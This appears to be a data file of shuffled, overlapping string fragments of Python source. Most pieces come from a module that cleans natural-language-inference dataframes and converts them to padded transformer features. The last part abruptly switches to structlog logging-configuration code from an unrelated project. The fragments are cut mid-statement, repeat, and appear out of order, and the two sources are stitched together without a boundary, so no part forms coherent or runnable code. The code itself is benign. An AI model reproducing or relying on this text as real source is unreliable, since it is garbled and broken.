"df.index result = parallelize_df2list(df_new, self.get_train_examples, n_cores) del df_new return result def df2examples_parallel_dev(self, df,",
"+ attention_mask token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids else: input_ids = input_ids",
"\"hypothesis\": new_h, \"label\": label, \"o_index\": o_index} return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\" drop",
"noqa s = s.apply(remove_first_space) # noqa remove space in the first position s",
"token_type_ids + \\ ([pad_token_segment_id] * padding_length) assert len(input_ids) == max_length, \"Error with input",
"padding_length = max_length - len(input_ids) if self.pad_on_left: input_ids = ([pad_token] * padding_length) +",
"data: pd.DataFrame :param text_column: colum text_column :type text_column: str \"\"\" s = data.loc[:,",
"in enumerate(label_list)} return label_map def _create_examples(self, df, set_type): \"\"\"Creates examples for the training",
"!= drop_label] def clean_df(df, n_cores): \"\"\" return clean version of the dataframe with",
"= parallelize_df2list(df_new, self.get_train_examples, n_cores) del df_new return result def df2examples_parallel_dev(self, df, n_cores): df_new",
"example.text_b, add_special_tokens=True, max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask has 1",
"df.copy() if \"o_index\" not in df_new.columns: df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new,",
"df_new = df.copy() if \"o_index\" not in df_new.columns: df_new.loc[:, \"o_index\"] = df.index result",
"return self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df, n_cores): df_new = df.copy() if \"o_index\" not",
"func=pre_process_nli_df, n_cores=n_cores) return df_new class NLIProcessor(DataProcessor): \"\"\"Processor for the any nli dataf frame",
"[f.attention_mask for f in features], dtype=torch.long) all_token_type_ids = torch.tensor( [f.token_type_ids for f in",
"1] * padding_length) + attention_mask token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids else:",
"remove double spaces return s def pre_process_nli_df(data): \"\"\" Apply preprocess on the input",
"noqa remove space in the first position s = s.apply((lambda x: spaces.sub(\" \",",
"the original index \"\"\" df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index df_new =",
"\\ ([0 if mask_padding_with_zero else 1] * padding_length) token_type_ids = token_type_ids + \\",
"on the input text from a NLI dataframe :param data: data frame with",
"data.label o_index = data.o_index dict_ = {\"premise\": new_p, \"hypothesis\": new_h, \"label\": label, \"o_index\":",
"features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features def examples2features_parallel(self, examples, n_cores): result = parallelize_df2list(examples,",
"def _create_examples(self, df, set_type): \"\"\"Creates examples for the training and dev sets.\"\"\" examples",
"df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new,",
"{}\".format( len(input_ids), max_length) assert len(attention_mask) == max_length, \"Error with input length {} vs",
"return self.df2examples(df, \"train\") def get_dev_examples(self, df): return self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df, n_cores):",
"s.apply(lambda x: x.lower()) s = s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa s",
"spaces.sub(\" \", x))) # noqa remove double spaces return s def pre_process_nli_df(data): \"\"\"",
"x: x.lower()) s = s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa s =",
"frame in csv (columns = premise | hypothesis | label)\"\"\" def __init__(self, hyperparams):",
"max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask has 1 for real",
"mask_padding_with_zero else 0] * len(input_ids) # Zero-pad up to the sequence length. padding_length",
"label 'drop_label' \"\"\" return df.loc[df.label != drop_label] def clean_df(df, n_cores): \"\"\" return clean",
"else: return x except IndexError: return x def simple_pre_process_text(data, text_column): \"\"\" preprocess all",
"pre_process_nli_df(df) examples = self._create_examples(df, set_type) return examples def get_train_examples(self, df): return self.df2examples(df, \"train\")",
"f in features], dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask for f in features], dtype=torch.long)",
"df = filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df) examples = self._create_examples(df, set_type) return examples def",
"df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return result",
"def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self): label_list = self.get_labels() label_map =",
"inputs[\"token_type_ids\"] # The mask has 1 for real tokens and 0 for padding",
"NLIProcessor(DataProcessor): \"\"\"Processor for the any nli dataf frame in csv (columns = premise",
"self.tokenizer = hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id",
"sets.\"\"\" examples = [] n = df.shape[0] for i in range(n): example =",
"= self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask",
"s.apply((lambda x: spaces.sub(\" \", x))) # noqa remove double spaces return s def",
"parallelize_df2list(examples, self._convert_examples_to_features, n_cores) return result def df2features(self, df, n_cores, mode): path = self.base_path",
":return: word withou space in front :rtype: str \"\"\" try: if x[0] ==",
"to a df \"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores) result =",
"spaces = re.compile(' +') def merge_lists(lists): base = [] for l in lists:",
"colum 'text' :type data: pd.DataFrame \"\"\" new_p = simple_pre_process_text(data, text_column=\"premise\") new_h = simple_pre_process_text(data,",
"= df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return result def get_labels(self):",
"transformers.data.processors.utils import DataProcessor from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile(' +')",
"preprocess all input text from dataframe by lowering, removing non words, removing space",
"in the first position s = s.apply((lambda x: spaces.sub(\" \", x))) # noqa",
"= re.compile(' +') def merge_lists(lists): base = [] for l in lists: base.extend(l)",
"import pandas as pd import numpy as np from multiprocessing import Pool import",
"df = pd.concat(pool.map(func, df_split)) pool.close() pool.join() return df def parallelize_df2list(df, func, n_cores): \"\"\"",
"pool.close() pool.join() return df def parallelize_df2list(df, func, n_cores): \"\"\" general fucntion to parallelize",
"inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask has 1 for real tokens and 0 for",
"n_cores) else: examples = self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples, n_cores) torch.save(features, path) return",
"torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile(' +') def merge_lists(lists): base =",
"_create_examples(self, df, set_type): \"\"\"Creates examples for the training and dev sets.\"\"\" examples =",
"= hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path =",
"= filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return df_new class NLIProcessor(DataProcessor): \"\"\"Processor for",
"= self.pad_token_segment_id mask_padding_with_zero = self.mask_padding_with_zero label_map = self.get_label_map() features = [] for (ex_index,",
"sequence length. padding_length = max_length - len(input_ids) if self.pad_on_left: input_ids = ([pad_token] *",
"TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile(' +') def merge_lists(lists): base = [] for",
"= [] for l in lists: base.extend(l) return base def parallelize_df2df(df, func, n_cores):",
"str :return: word withou space in front :rtype: str \"\"\" try: if x[0]",
"# noqa remove space in the first position s = s.apply((lambda x: spaces.sub(\"",
"input_ids = ([pad_token] * padding_length) + input_ids attention_mask = ([0 if mask_padding_with_zero else",
"1] * padding_length) token_type_ids = token_type_ids + \\ ([pad_token_segment_id] * padding_length) assert len(input_ids)",
"= df.copy() if \"o_index\" not in df_new.columns: df_new.loc[:, \"o_index\"] = df.index result =",
"del df_new return result def df2examples_parallel_dev(self, df, n_cores): df_new = df.copy() df_new.loc[:, \"o_index\"]",
"= self.max_length pad_token = self.pad_token pad_token_segment_id = self.pad_token_segment_id mask_padding_with_zero = self.mask_padding_with_zero label_map =",
":type data: pd.DataFrame :param text_column: colum text_column :type text_column: str \"\"\" s =",
"label_map = self.get_label_map() features = [] for (ex_index, example) in enumerate(examples): len_examples =",
"features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading features from cached file %s\", cached_features_file) features = torch.load(cached_features_file)",
"padding_length) token_type_ids = token_type_ids + \\ ([pad_token_segment_id] * padding_length) assert len(input_ids) == max_length,",
"base def parallelize_df2df(df, func, n_cores): \"\"\" general fucntion to parallelize a function applied",
"return clean version of the dataframe with the original index \"\"\" df_new =",
"\"Error with input length {} vs {}\".format( len(input_ids), max_length) assert len(attention_mask) == max_length,",
"max_length - len(input_ids) if self.pad_on_left: input_ids = ([pad_token] * padding_length) + input_ids attention_mask",
"self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df, n_cores): df_new = df.copy() if \"o_index\" not in",
"return features def examples2features_parallel(self, examples, n_cores): result = parallelize_df2list(examples, self._convert_examples_to_features, n_cores) return result",
"result = parallelize_df2list(df_new, self.get_train_examples, n_cores) del df_new return result def df2examples_parallel_dev(self, df, n_cores):",
"def features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading features from cached file %s\", cached_features_file) features =",
"in features], dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask for f in features], dtype=torch.long) all_token_type_ids",
"self.max_length) logging.info(\"Saving features in file: %s\", path) if mode.find(\"train\") > -1: examples =",
"= {\"premise\": new_p, \"hypothesis\": new_h, \"label\": label, \"o_index\": o_index} return pd.DataFrame(dict_) def filter_df_by_label(df,",
"from a NLI dataframe :param data: data frame with the colum 'text' :type",
"{label: i for i, label in enumerate(label_list)} return label_map def _create_examples(self, df, set_type):",
"first position s = s.apply((lambda x: spaces.sub(\" \", x))) # noqa remove double",
"return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\" drop observations with label 'drop_label' \"\"\" return",
"self.get_dev_examples, n_cores) del df_new return result def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def",
"lists: base.extend(l) return base def parallelize_df2df(df, func, n_cores): \"\"\" general fucntion to parallelize",
"{} vs {}\".format( len(input_ids), max_length) assert len(attention_mask) == max_length, \"Error with input length",
"+ ([pad_token] * padding_length) attention_mask = attention_mask + \\ ([0 if mask_padding_with_zero else",
"<filename>src/lr/models/transformers/processor.py import re import logging import torch import os import pandas as pd",
"df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del",
"def get_label_map(self): label_list = self.get_labels() label_map = {label: i for i, label in",
"def merge_lists(lists): base = [] for l in lists: base.extend(l) return base def",
"label_map def _create_examples(self, df, set_type): \"\"\"Creates examples for the training and dev sets.\"\"\"",
"tokens are attended to. attention_mask = [ 1 if mask_padding_with_zero else 0] *",
"x.lower()) s = s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa s = s.apply(remove_first_space)",
"== max_length, \"Error with input length {} vs {}\".format( len(token_type_ids), max_length) label =",
"self.examples2features_parallel(examples, n_cores) torch.save(features, path) return path def features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading features from",
"double spaces return s def pre_process_nli_df(data): \"\"\" Apply preprocess on the input text",
"\"\"\" return df.loc[df.label != drop_label] def clean_df(df, n_cores): \"\"\" return clean version of",
"of the dataframe with the original index \"\"\" df_new = df.copy() df_new.loc[:, \"o_index\"]",
"attended to. attention_mask = [ 1 if mask_padding_with_zero else 0] * len(input_ids) #",
"Zero-pad up to the sequence length. padding_length = max_length - len(input_ids) if self.pad_on_left:",
"set_type) return examples def get_train_examples(self, df): return self.df2examples(df, \"train\") def get_dev_examples(self, df): return",
"= s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa s = s.apply(remove_first_space) # noqa",
"Pool(n_cores) result = merge_lists(pool.map(func, df_split)) pool.close() pool.join() return result def remove_first_space(x): \"\"\" remove_first_space",
"def filter_df_by_label(df, drop_label='-'): \"\"\" drop observations with label 'drop_label' \"\"\" return df.loc[df.label !=",
"with input length {} vs {}\".format( len(attention_mask), max_length) assert len(token_type_ids) == max_length, \"Error",
"features], dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask for f in features], dtype=torch.long) all_token_type_ids =",
"torch.tensor( [f.input_ids for f in features], dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask for f",
"from transformers.data.processors.utils import InputExample, InputFeatures from transformers.data.processors.utils import DataProcessor from torch.utils.data import TensorDataset",
"original index \"\"\" df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True)",
"padding_length) + input_ids attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length) +",
"pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\" drop observations with label 'drop_label' \"\"\" return df.loc[df.label",
"nli dataf frame in csv (columns = premise | hypothesis | label)\"\"\" def",
"new_p, \"hypothesis\": new_h, \"label\": label, \"o_index\": o_index} return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\"",
"label)\"\"\" def __init__(self, hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left =",
"hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path = hyperparams[\"base_path\"] def df2examples(self, df, set_type): df =",
"all_input_ids = torch.tensor( [f.input_ids for f in features], dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask",
"input length {} vs {}\".format( len(attention_mask), max_length) assert len(token_type_ids) == max_length, \"Error with",
"([pad_token_segment_id] * padding_length) assert len(input_ids) == max_length, \"Error with input length {} vs",
"in csv (columns = premise | hypothesis | label)\"\"\" def __init__(self, hyperparams): super().__init__()",
"DataProcessor from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile(' +') def merge_lists(lists):",
"self.df2examples(df, \"train\") def get_dev_examples(self, df): return self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df, n_cores): df_new",
"= ([pad_token] * padding_length) + input_ids attention_mask = ([0 if mask_padding_with_zero else 1]",
"+ input_ids attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length) + attention_mask",
"logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile(' +') def merge_lists(lists): base = [] for l",
"= self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples, n_cores) torch.save(features, path) return path def features2dataset(cached_features_file):",
"f in features], dtype=torch.long) all_labels = torch.tensor([f.label for f in features], dtype=torch.long) dataset",
"get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self): label_list = self.get_labels() label_map = {label:",
"import torch import os import pandas as pd import numpy as np from",
"else 1] * padding_length) + attention_mask token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids",
"# tokens are attended to. attention_mask = [ 1 if mask_padding_with_zero else 0]",
"attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length) + attention_mask token_type_ids =",
"name) input_example = InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples def _convert_examples_to_features(self, examples):",
"and removing double spaces :param data: data frame with the colum 'text' :type",
"df.copy() df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return",
"base.extend(l) return base def parallelize_df2df(df, func, n_cores): \"\"\" general fucntion to parallelize a",
"real tokens and 0 for padding tokens. Only real # tokens are attended",
"path) if mode.find(\"train\") > -1: examples = self.df2examples_parallel_train(df, n_cores) else: examples = self.df2examples_parallel_dev(df,",
"text_column].copy() s = s.apply(lambda x: x.lower()) s = s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x)))",
"df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return result def get_labels(self): return",
"len(attention_mask) == max_length, \"Error with input length {} vs {}\".format( len(attention_mask), max_length) assert",
"text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples def _convert_examples_to_features(self, examples): max_length = self.max_length pad_token",
"filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df) examples = self._create_examples(df, set_type) return examples def get_train_examples(self, df):",
"attention_mask token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids else: input_ids = input_ids +",
"re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa s = s.apply(remove_first_space) # noqa remove space in",
"csv (columns = premise | hypothesis | label)\"\"\" def __init__(self, hyperparams): super().__init__() self.tokenizer",
"premise | hypothesis | label)\"\"\" def __init__(self, hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length",
"in range(n): example = df.loc[i] name = example.o_index guid = \"{}-{}\".format(set_type, name) input_example",
"text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples def _convert_examples_to_features(self, examples): max_length = self.max_length pad_token =",
"simple_pre_process_text(data, text_column): \"\"\" preprocess all input text from dataframe by lowering, removing non",
"x[1:] else: return x except IndexError: return x def simple_pre_process_text(data, text_column): \"\"\" preprocess",
"fucntion to parallelize a function applied to a df \"\"\" df_split = np.array_split(df,",
"for f in features], dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask for f in features],",
"np from multiprocessing import Pool import random from transformers.data.processors.utils import InputExample, InputFeatures from",
"pool = Pool(n_cores) result = merge_lists(pool.map(func, df_split)) pool.close() pool.join() return result def remove_first_space(x):",
"n_cores) pool = Pool(n_cores) result = merge_lists(pool.map(func, df_split)) pool.close() pool.join() return result def",
"pool.close() pool.join() return result def remove_first_space(x): \"\"\" remove_first_space from word x :param x:",
"with input length {} vs {}\".format( len(token_type_ids), max_length) label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask,",
"\"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return result def",
"for i, label in enumerate(label_list)} return label_map def _create_examples(self, df, set_type): \"\"\"Creates examples",
"a NLI dataframe :param data: data frame with the colum 'text' :type data:",
"not in df_new.columns: df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_train_examples, n_cores) del",
"i in range(n): example = df.loc[i] name = example.o_index guid = \"{}-{}\".format(set_type, name)",
"self.get_label_map() features = [] for (ex_index, example) in enumerate(examples): len_examples = len(examples) inputs",
"word withou space in front :rtype: str \"\"\" try: if x[0] == \"",
"\" \": return x[1:] else: return x except IndexError: return x def simple_pre_process_text(data,",
"= self.get_labels() label_map = {label: i for i, label in enumerate(label_list)} return label_map",
"hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token =",
"simple_pre_process_text(data, text_column=\"premise\") new_h = simple_pre_process_text(data, text_column=\"hypothesis\") label = data.label o_index = data.o_index dict_",
"return label_map def _create_examples(self, df, set_type): \"\"\"Creates examples for the training and dev",
"result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return result def get_labels(self): return [\"contradiction\",",
"training and dev sets.\"\"\" examples = [] n = df.shape[0] for i in",
"merge_lists(lists): base = [] for l in lists: base.extend(l) return base def parallelize_df2df(df,",
"space in front :rtype: str \"\"\" try: if x[0] == \" \": return",
"words, removing space in the first position and removing double spaces :param data:",
"from multiprocessing import Pool import random from transformers.data.processors.utils import InputExample, InputFeatures from transformers.data.processors.utils",
"inputs = self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The",
"def remove_first_space(x): \"\"\" remove_first_space from word x :param x: word :type x: str",
"padding_length) attention_mask = attention_mask + \\ ([0 if mask_padding_with_zero else 1] * padding_length)",
"result = merge_lists(pool.map(func, df_split)) pool.close() pool.join() return result def remove_first_space(x): \"\"\" remove_first_space from",
"padding_length) + token_type_ids else: input_ids = input_ids + ([pad_token] * padding_length) attention_mask =",
"= self.examples2features_parallel(examples, n_cores) torch.save(features, path) return path def features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading features",
"dataf frame in csv (columns = premise | hypothesis | label)\"\"\" def __init__(self,",
"self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask has",
"len(token_type_ids) == max_length, \"Error with input length {} vs {}\".format( len(token_type_ids), max_length) label",
"text from a NLI dataframe :param data: data frame with the colum 'text'",
"= attention_mask + \\ ([0 if mask_padding_with_zero else 1] * padding_length) token_type_ids =",
"drop observations with label 'drop_label' \"\"\" return df.loc[df.label != drop_label] def clean_df(df, n_cores):",
"merge_lists(pool.map(func, df_split)) pool.close() pool.join() return result def remove_first_space(x): \"\"\" remove_first_space from word x",
"def parallelize_df2df(df, func, n_cores): \"\"\" general fucntion to parallelize a function applied to",
"max_length, \"Error with input length {} vs {}\".format( len(input_ids), max_length) assert len(attention_mask) ==",
"\"\"\" Apply preprocess on the input text from a NLI dataframe :param data:"
"event_dict.get('_record') if record is None: return event_dict event_dict['function'] = record.funcName return event_dict def",
"def __call__(self, logger, method_name, event_dict): exc_info = event_dict.pop('exc_info', None) if exc_info is None:",
"structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer",
"event_dict def order_keys(order): \"\"\" Order keys for JSON readability when not using json_log=True",
"value = path_value(ed, key_hint) return format_kv(key_hint, value) def from_key_hints(ed) -> List[str]: key_hints =",
"import OrderedDict from typing import Optional, List, Any, Dict import structlog import sys",
"getattr(exc, '__structlog__', None) if not callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict structured_error =",
"[ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter,",
"for JSON readability when not using json_log=True \"\"\" def processor(logger, method_name, event_dict): if",
"not in event_dict: event_dict['message'] = event event_dict['event'] = 'foreign' return event_dict def rename_level_to_severity(logger,",
"'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', }, }, 'loggers': { '': { 'handlers':",
"level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def configure_logging( level_name: str='INFO', for_humans: bool=False,",
"[ from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if all(hint is None for hint",
"+= from_key_hints(event_dict) if all(hint is None for hint in hints): if event_dict.get('message') is",
"wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event') if event is",
"structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [ # Add the log level and",
"event_dict['function'] = record.funcName return event_dict def order_keys(order): \"\"\" Order keys for JSON readability",
"events event = event_dict.get('event') if event is None: return event_dict if isinstance(event, events.EventEnum):",
"in reversed(order): if key in event_dict: event_dict.move_to_end(key, last=False) return event_dict return processor def",
"is None: return event_dict event_dict['function'] = record.funcName return event_dict def order_keys(order): \"\"\" Order",
") foreign_pre_chain = [ # Add the log level and a timestamp to",
"'stream': sys.stdout, 'formatter': 'structlog', }, }, 'loggers': { '': { 'handlers': ['default'], 'level':",
"None: event_dict['message'] = event_dict.get('event') return event_dict prefix = event_dict['event'] hint = ', '.join(hint",
"hint = event_dict.pop('hint', None) if hint is None: return try: return hint.format(**event_dict) except",
"indent = json_indent or None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain =",
"structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name,",
"structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer = structlog.dev.ConsoleRenderer() # <=== else: # Make it",
"-> str: return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict)",
"path_value(dict_: Dict[str, Any], key_path: str) -> Optional[Any]: value = dict_ for key in",
"dictionary keys. ``hint`` : ``Optional[str]`` will be formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed):",
"event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ]",
"method_name, event_dict): from k8s_snapshots import events event = event_dict.get('event') if event is None:",
"the log level and a timestamp to the event_dict if the log entry",
"}, 'k8s_snapshots': { 'level': 'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(),",
"not using json_log=True \"\"\" def processor(logger, method_name, event_dict): if not isinstance(event_dict, OrderedDict): return",
"[ # Add the log level and a timestamp to the event_dict if",
"``Optional[str]`` a '.'-separated path of dictionary keys. ``hint`` : ``Optional[str]`` will be formatted",
"-> Optional[Any]: value = dict_ for key in key_path.split('.'): if value is None:",
"Any, Dict import structlog import sys from k8s_snapshots import serialize class ProcessStructuredErrors: def",
"hint in hints if hint is not None) message = event_dict.get('message') if message",
"sys from k8s_snapshots import serialize class ProcessStructuredErrors: def __init__(self): pass def __call__(self, logger,",
"def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import events event = event_dict.get('event') if event",
"}, }, 'loggers': { '': { 'handlers': ['default'], 'level': root_logger_level, 'propagate': True, },",
"hints += from_key_hints(event_dict) if all(hint is None for hint in hints): if event_dict.get('message')",
"event_dict): if not isinstance(event_dict, OrderedDict): return event_dict for key in reversed(order): if key",
"= event_dict.get('_record') if record is None: return event_dict event_dict['function'] = record.funcName return event_dict",
"0 ⇒ None indent = json_indent or None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps",
"for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ):",
"structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name == 'DEBUG': root_logger_level = 'DEBUG'",
"log entry # is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity,",
"callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict structured_error = __structlog__() event_dict['structured_error'] = structured_error return",
"str: return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if",
"hint is not None) message = event_dict.get('message') if message is not None: message",
"structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer = structlog.dev.ConsoleRenderer() # <===",
"Dict[str, Any], key_path: str) -> Optional[Any]: value = dict_ for key in key_path.split('.'):",
"method_name, event_dict): \"\"\" Creates a ``message`` value based on the ``hint`` and ``key_hint``",
"'__structlog__', None) if __structlog__ is not None: value = __structlog__() value = value.get(key)",
"def add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record') if record is None: return event_dict",
"it so that 0 ⇒ None indent = json_indent or None renderer =",
"event_dict['event'] hint = ', '.join(hint for hint in hints if hint is not",
"not isinstance(event_dict, OrderedDict): return event_dict for key in reversed(order): if key in event_dict:",
"and ``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a '.'-separated path of dictionary keys. ``hint``",
"``Optional[str]`` will be formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint = event_dict.pop('hint', None)",
"not callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict structured_error = __structlog__() event_dict['structured_error'] = structured_error",
"``hint`` : ``Optional[str]`` will be formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint =",
"if key_hint is None: return value = path_value(ed, key_hint) return format_kv(key_hint, value) def",
"event_dict): from k8s_snapshots import events event = event_dict.get('event') if event is None: return",
"value = __structlog__() value = value.get(key) return value def from_key_hint(ed) -> Optional[str]: key_hint",
"structlog.dev.ConsoleRenderer() # <=== else: # Make it so that 0 ⇒ None indent",
"return event_dict def order_keys(order): \"\"\" Order keys for JSON readability when not using",
"key in reversed(order): if key in event_dict: event_dict.move_to_end(key, last=False) return event_dict return processor",
"= event_dict['event'] hint = ', '.join(hint for hint in hints if hint is",
"Order keys for JSON readability when not using json_log=True \"\"\" def processor(logger, method_name,",
"{ 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer,",
"exc_info return event_dict structured_error = __structlog__() event_dict['structured_error'] = structured_error return event_dict def add_message(logger,",
